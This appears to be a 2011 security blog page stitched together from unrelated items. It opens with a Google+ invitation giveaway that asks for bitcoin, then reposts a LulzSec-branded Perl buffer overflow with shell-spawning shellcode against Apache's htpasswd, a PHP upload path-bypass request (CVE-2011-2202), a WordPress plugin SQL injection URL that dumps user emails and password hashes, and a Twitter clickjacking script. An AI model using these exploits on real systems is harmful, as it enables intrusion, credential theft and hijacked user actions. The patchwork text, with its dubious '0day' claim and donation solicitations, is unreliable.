Just like we did for Quora (http://www.devquotes.com/2011/01/06/providing-quora-com-invitations/), we will provide any invitations needed for those who totally want to try this already famous Google+ :)

Just follow the steps:

1. follow @devquotescom on Twitter,
2. tweet: thanks @devquotescom for providing me a #Google+ invitation – [YOUR EMAIL HERE],
3. wait,
4. enjoy Google+’s features!
5. Expect some fresh new posts @devquotescom very soon.
6. Send bitcoin here as a reward : 1vjhAZza4iNKxvNfKfsHNoharRNcXrtZr

Today the famous group just released one of the many 0day they’re using :

You got here the code :)

RC: irc.lulzco.org (channel #LulzSec | port 6697 for SSL)
BitCoin donations: 176LRX4WRWD5LWDMbhr94ptb2MW9varCZP
Twitter: @LulzSec
Contact us: 614-LULZSEC

. /$$                 /$$            /$$$$$$
.| $$                | $$           /$$__  $$
.| $$       /$$   /$$| $$ /$$$$$$$$| $$  \__/  /$$$$$$   /$$$$$$$
.| $$      | $$  | $$| $$|____ /$$/|  $$$$$$  /$$__  $$ /$$_____/
.| $$      | $$  | $$| $$   /$$$$/  \____  $$| $$$$$$$$| $$
.| $$      | $$  | $$| $$  /$$__/   /$$  \ $$| $$_____/| $$
.| $$$$$$$$|  $$$$$$/| $$ /$$$$$$$$|  $$$$$$/|  $$$$$$$|  $$$$$$.$
.|________/ \______/ |__/|________/ \______/  \_______/ \_______/
                          //Laughing at your security since 2011!

.--    .-""-.
.   ) (     )
.  (   )   (
.     /     )
.    (_    _)                     0_,-.__
.      (_  )_                     |_.-._/
.       (    )                    |lulz..\
.        (__)                     |__--_/
.     |''   ``\                   |
.     | [Lulz] \                  |      /b/
.     |         \  ,,,---===?A`\  |  ,==y'
.   ___,,,,,---==""\        |M] \ | ;|\ |>
.           _   _   \   ___,|H,,---==""""bno,
.    o  O  (_) (_)   \ /          _     AWAW/
.                     /         _(+)_  dMM/
.      \@_,,,,,,---=="   \      \\|//  MW/
.--''''"                         ===  d/
.                                    //   SET SAIL FOR FAIL!
.                                    ,'_________________________
.   \    \    \     \               ,/~~~~~~~~~~~~~~~~~~~~~~~~~~~
.                         _____    ,'  ~~~   .-""-.~~~~~~  .-""-.
.      .-""-.           ///==---   /`-._ ..-'      -.__..-'
.            `-.__..-' =====\\\\\\ V/  .---\.
.                     ~~~~~~~~~~~~, _',--/_.\  .-""-.
.                            .-""-.___` --  \|         -.__..-

Greetings Lulz Lizards, it is finally time we released our 0 day apache exploit, use the cannons swiftly and let our enemy's be overwhelmed with our Lulz!

===========================================

#!/usr/bin/perl
# 0 Day Apache Exploit
# LulzSecurity #AntiSec

$shellcode = "\x31\xdb\x6a\x17\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68".
"\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"; 

$target = "/usr/local/apache/bin/htpasswd";
$retaddr = 0xbffffffa - length($shellcode) - length($target); 

print "using retaddr = 0x", sprintf('%lx',($retaddr)), "\r\n"; 

local($ENV{'XXX'}) = $shellcode;
$newret = pack('l', $retaddr);
$buffer = "A" x 272;
$buffer .= $newret x 4;
$buffer .= " ";
$buffer .= "B" x 290; 

exec("$target -nb $buffer");

PHP is prone to a security-bypass vulnerability.Successful exploits will allow an attacker to delete files from the root directory, which may aid in further attacks.
PHP 5.3.6 is vulnerable; other versions may also be affected.

Webmasters are advised to manually patch their PHP installations after a serious flaw allowing attackers to potentially delete files from their root directories was publicly disclosed.

The vulnerability lies in the « SAPI_POST_HANDLER_FUNC() » function in rfc1867.c and can be exploited to append forward or back slashes before the file name during an upload. This allows an attacker, for example, to delete files from the root directory or can be combined with other vulnerabilities to enhance attacks. The flaw is described as an input validation error and security bypass issue. Vulnerability research vendor Secunia rates it as « less critical. » A Polish web application developer named Krzysztof Kotowicz is credited with discovering and reporting the issue, but even though it was patched on June 12, details about the flaw have been available online since May 27.

The vulnerability, identified as CVE-2011-2202, affects PHP 5.3.6 and earlier versions. No new package has been released yet, but a patch can be grabbed from the repository and applied manually. The vulnerability  does not require authentication, and has a partial impact on system integrity. System confidentiality  are affected too.

It’s still unclear whether its access complexity should be low, as listed in an IBM XSS Force advisory, or high, as considered by the Red Hat security team.

Exploit found on pastebin.com

HTTP Request:
====
POST /file-upload-fuzz/recv_dump.php HTTP/1.0
host: blog.security.localhost
content-type: multipart/form-data; boundary=———-ThIs_Is_tHe_bouNdaRY_$
content-length: 200

————ThIs_Is_tHe_bouNdaRY_$
Content-Disposition: form-data; name= »contents »; filename= »/anything.here.slash-will-pass »;
Content-Type: text/plain

any
————ThIs_Is_tHe_bouNdaRY_$–

HTTP Response:
====
HTTP/1.1 200 OK
Date: Fri, 27 May 2011 11:35:08 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Content-Length: 30
Connection: close
Content-Type: text/html

/anything.here.slash-will-pass

PHP script:
=====
if (!empty($_FILES['contents'])) { // process file upload
echo $_FILES['contents']['name'];
unlink($_FILES['contents']['tmp_name']);
}

Served as found on the interweb :

WordPress « wp star rating » plugin SQL injection

http://yourwordpress/wp-content/plugins/gd-star-rating/ajax.php?_wpnonce=<insert_valid_nonce>&vote_type=cache&vote_domain=a&votes=asr.1.xxx.1.2.5+limit+0+union+select+1,0×535242,1,1,co

ncat(0x613a313a7b733a363a226e6f726d616c223b733a323030303a22,substring(concat((select+concat(user_nicename,0x3a,user_email,0x3a,user_login,0x3a,user_pass)+from+wp_users+where+length(user_pass)%3E0+order+by+id+limit+0,1),repeat(0×20,2000)),1,2000),0x223b7d),1,1,1+limit+1

A new follow button which allow to instantly follow a user is now available. The particularity of this new button ( so does google +1) is that user don’t need to go on Twitter.com website everythings i handled in iframe.

A french pentester realeased a POC ( prooof of concept) of the vulnerabilty :

Here is how it’s work :

• You set the iframe fully transparent/invisible via CSS.
• You capture the mouse event.
• When the user move the mouse, you move the twitter button iframe in order it always stay under the cursor.
• If the user click somewhere on your page, he will automatcly follow your account.

Here is the code :

if (!document.getElementsByClassName){
        document.getElementsByClassName = function(classname){
                for (i=0; i < document.getElementsByTagName("*").length; i++)
                {
                        if (document.getElementsByTagName("*").item(i).className == classname){
                                return new Array(document.getElementsByTagName("*").item(i));
                        }
                }
        }
}

var twitterFollowIframe = document.getElementsByClassName('twitter-follow-button')[0];
twitterFollowIframe.style.position = 'absolute';
twitterFollowIframe.style.opacity = '0.2';
twitterFollowIframe.style.filter = 'alpha(opacity=20)';

document.onmousemove = function(e){
        if ( !e ) e = window.event;
        twitterFollowIframe.style.left = e.clientX - 20;
        twitterFollowIframe.style.top = e.clientY - 10;
}

You can find the proof of concept at this page : http://serphacker.com/twitter-follow-clickjacking.html

Destination server is down atm here are the POC source code with 20% of opacity:

SERP Hacker



Tested on Firefox 3 and IE7

Just move the mouse and click somewhere, you will automatically follow my twitter account if you are already connected on twittR, remember we can make the button totally hidden by setting opacity 0.


Follow SERP Hacker